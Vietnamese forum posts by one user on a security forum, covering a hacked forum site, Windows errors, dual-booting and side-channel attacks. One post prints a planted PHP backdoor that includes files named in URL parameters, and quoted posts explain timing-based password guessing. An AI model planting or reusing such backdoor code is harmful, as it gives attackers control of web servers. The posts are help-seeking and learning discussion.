Messages posted by: truyennxt

Em đã cho phép lưu cookie và đã duyệt ok. Cảm ơn anh

Các anh BQT cho e hỏi với:

- Em dùng blackberry đã cài GPRS, duyệt HVA bằng opera mini nhưng bị trả về null khi vào forum. Vậy cần phải cài đặt hay chỉnh cấu hình như thế nào để truy cập được HVA?

Hôm nay em có truy cập vào diễn đàn thì file forum.php đã bị thay đổi hoàn toàn. Nó chỉ có vài dòng lệnh để hiển thị video, em biết là đã bị hack nên vội vào host để sửa file thì thấy file ini.php (trước đây chưa từng có)

Nội dung của file đó như sau:

Code:

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>

Vậy em mong muốn được biết là forum đã bị hack như thế nào, do lỗi gì và cách bảo mật cho tốt. Xin cảm ơn!

vipbk09 wrote:

Sáng nay đẹp trời, bà chị phòng mình login vào Windows XP thì tất cả các chương trình, các file exe, chuột phải + propties, contropanel đều hiện ra thông báo:

"Windows cannot access the specified device, path or file. You may not have the appropriate permissions to access them."

Máy có cài BKPro nhưng thằng shit này cũng bị hiện tượng như trên (vì control panel đã bị khoá nên ko thể remove và tắt nó được)

Cho mình hỏi hướng khắc phục.

Có chăng ai đó đã tác động vào registry của máy này không. Bạn xem qua cái này xem có thể giúp bạn không nhé:
http://home.windowsusers.net/khac-phuc-loi-windows-access-device-path-file-khi-mo-dvd-phim-tren-windows-7.html

Cách khôi phục lại mình không biết. Nhưng nếu bạn muốn sài chung 2 OS thì theo mình:

Chịu mất dự liệu ( Tức là cài lại windows).

Chú ý: khi cài windows không nên chọn hết dung lượng ổ cứng vì còn chừa lại để chỗ cho linux.

Tiếp theo: Khi xong windows thì bạn hãy cho đĩa Ubuntu vào và khởi động bằng CD/DVD trong boot. khi màn hình màu tím hiện ra bạn gõ Enter---> chọn ngôn ngữ English--->Chọn install ubuntu và đợi nó chạy. Khi có màn hình tiếp theo xuất hiện bạn tiếp tục chọn "install ubuntu", nhấn forward. Khi nào tới phần chọn ổ đĩa. Bạn tick vào ô "Specify partitions manually (advanced)". Như hình: (Có thể dùng chuột kéo trên thanh đó để chọn dung lượng)

Rồi continue và cài đặt thôi.

Theo em hiểu : social engineering là phương pháp "lừa" đối phương thông qua các phương tiện có thể là "điện thoại, mail, tiếp xúc trực tiếp, hay thông qua các mối quan hệ" mà non-technical. Những cái này thì đúng là nhiều khi victim sẽ tự đưa ra thông tin cho hacker mà không hề biết là mình bị tấn công. Tuy nhiên cũng có yếu tố "đoán" của hacker đó chứ. Ví dụ họ đoán thông qua tâm lý hay thông qua tiếp xúc để nắm bắt ngôn từ rồi đoán. Vậy là khi không có thông tin từ chính victim đưa ra thì hacker phải "đoán". Nếu đã "đoán" thì có liên quan tới side attack.

Thanks mọi người, em đang "đọc và nghiền ngẫm" những cái cơ bản nhất để có thể hiểu được.
Có vấn đề gì mới trong phần này mong mọi người chỉ giáo thêm. smilie

to cr4zyb0y: Rất vui nếu bạn đã viết xong thì hãy gửi cho mọi người xem.

To lamer: Em thực sự không phải dân chuyên cntt smilie

. Em đang theo học Banking và đang muốn học thêm cntt. Vì thế anh bảo em viết code thì em ko thể viết ngay mà phải "đọc hiểu" đã anh ạ .

Mình cũng đã đọc và biết là kiểu tấn công này dựa vào yếu tố bên lề như:
--Việc phát ra sóng điện từ của màn hình....

lamer: Chủ chủ đề có muốn tự viết ra một đoạn mã so sánh chuỗi như vậy rồi cùng thảo luận tiếp không?

me: Rất mong muốn được thảo luận tiếp chứ smilie

. Mình đang cố gắng học hỏi mà. Mình cũng đang rảnh nên đang ngồi mạng nghiên cứu xem có thể viết được đoạn mã không đây. Có gì mình sẽ hỏi và mong nhận được sự giúp đỡ.

WinDak: "side-channel attack dựa vào các thông tin phản hồi trong xử lý thông tin ví dụ như thời gian để dự đoán các tiến trình xử lý của ứng dụng. "

me: Có nghĩa là attacker tấn công vào phần "xác nhận" hoặc có thể hiểu là giai đoạn "khớp" thông tin đúng không bạn.?

ví dụ: 1 trang web yêu cầu đăng nhập để sử dụng hệ thống thì sẽ có "Bảng login". Và khi nhập vào gửi yêu cầu thì sẽ có giai đoạn là "xử lý nhập liệu". Attacker sẽ lợi dụng "code" của giai đoạn xử lý nhập liệu bị lỗi đâu đó mà attack.

hiểu vậy có đúng không nhỉ?

freakmind: "Ví dụ đầu tiên bạn sẽ thử cho input là a*** cho đến Z*** và đo thời gian process của từng input một, thằng nào thời gian input lâu nhất thì password sẽ chứa thằng đó, ví dụ ra là b***. Sau đó quá trình này được lặp lại với việc cho input từ ba** đến bZ** ....."

me: Mình đã đọc qua cái timing này và cộng thêm bạn phân tích điểm này mình hiểu thêm về nó. Thanks.

Chắc bạn mới tham gia diễn đàn vì thấy có 2 bài viết. Mình cũng mới chỉ có gần 10 bài "comment" mà thôi. Và "kinh nghiệm" của mình khi tham gia HVA là vào "phòng đọc" nghiên cứu để tự bản thân mình không đặt những câu hỏi dạng "làm thế nào để hack, tìm lỗi, hay trộm pass admin".
Một vài góp ý!

Trong mấy ngày qua mình có đọc về cái kiểu tấn công này. Trong bài đọc mình thấy sơ qua ý chính của kiểu tấn công này là lợi dụng "độ trễ" (latency). Vậy "độ trễ" là gì mà attacker lại tấn công nó mà lấy đi USD ở thị trường chứng khoán. Mình có ý định lên hỏi "độ trễ" là gì, nhưng nghĩ ngẫm "nên tìm hiểu trước khi hỏi". Nên mình ngồi mạng search về cái khái niệm khó hiểu này.

Khái niệm độ trễ biểu thị quãng thời gian bạn phải chờ trước khi nhận được thứ mình cần. Theo từ điển Merriam-Webster thì latency có nghĩa là 'khoảng thời gian từ khi ra lệnh đến khi nhận được sự phản hồi'

Mình chỉ biết là như vậy, và "theo mình nghĩ" thì khi một lệnh A được gửi đi rồi "chờ" phản hồi lại thì attacker sẽ lợi dụng thời điểm đó để có thể "can thiệp" rồi gửi phản hồi "giả". Cộng thêm có thể "chặn" phản hồi "thật".

Vậy về phượng diện "sâu" hơn của "kỹ thuật" thì attacker làm thế nào để "lợi dụng" độ trễ này?

Mình thấy lạ là bạn cài vbb mà bạn không cần sửa file config thì khó hiểu. VBB cả bản null hay keygen đều cần phải chỉnh config cả, và nếu dùng host free thì chỗ localhost cần phải thay bằng tên host của bạn (sql.xxx.xxx)

Đoạn viết của bạn có 2 ý.
1- Nên thi đại học hay học chứng chỉ về IT.
Bạn hiểu gì và đã biết gì về chương trình học chứng chỉ rồi mà bạn hỏi vậy. Hay chỉ nghe ai đó nói, hay qua phương tiện truyền thông chỉ nghe danh aptech, Arena, Npower là thích.?

2-Bạn hiểu từ ''quản trị'' như thế nào? từ ''lập trình'' ra sao?
Theo mình thì để học quản trị thì nên đi từ đầu đó là tin học căn bản. Tại sao?
Với một nhà quản trị web họ không thể thiếu khả năng về ngôn ngữ, mà để học và tiến tới
ngôn ngữ rồi bảo mật thì theo mình bạn nên đi từ pascal, C, ........
Vậy cái đó thì trường đại học đào tạo bài bản hơn, chứng chỉ và trung tâm là nơi mà người ta
đào tạo những người đã có căn bản rồi.

Chắc họ dùng phần mềm này để phá pass của bạn
http://www.mediafire.com/?jgtnhzm35yy

Và nếu như syskey đã bị phá thì ko còn có thể đặt lại nữa đâu bạn ạ

4netvn.co.cc

Cách vượt qua bước xác minh tài khoản

Đó là khi đăng ký bạn hãy sử dụng trình duyệt Internet Explorer thay cho Firefox và nhớ điền vào địa chỉ email khác của bạn ở mục Secondary email.

4netvn.co.cc

Hic. Sau 3s nó chuyển sang trang chủ google. Liệu đây có phải là dấu hiệu của hack domain không nhỉ. Mình cũng không nắm rõ, nhưng bước đầu tiên mình có hướng suy nghĩ như vậy.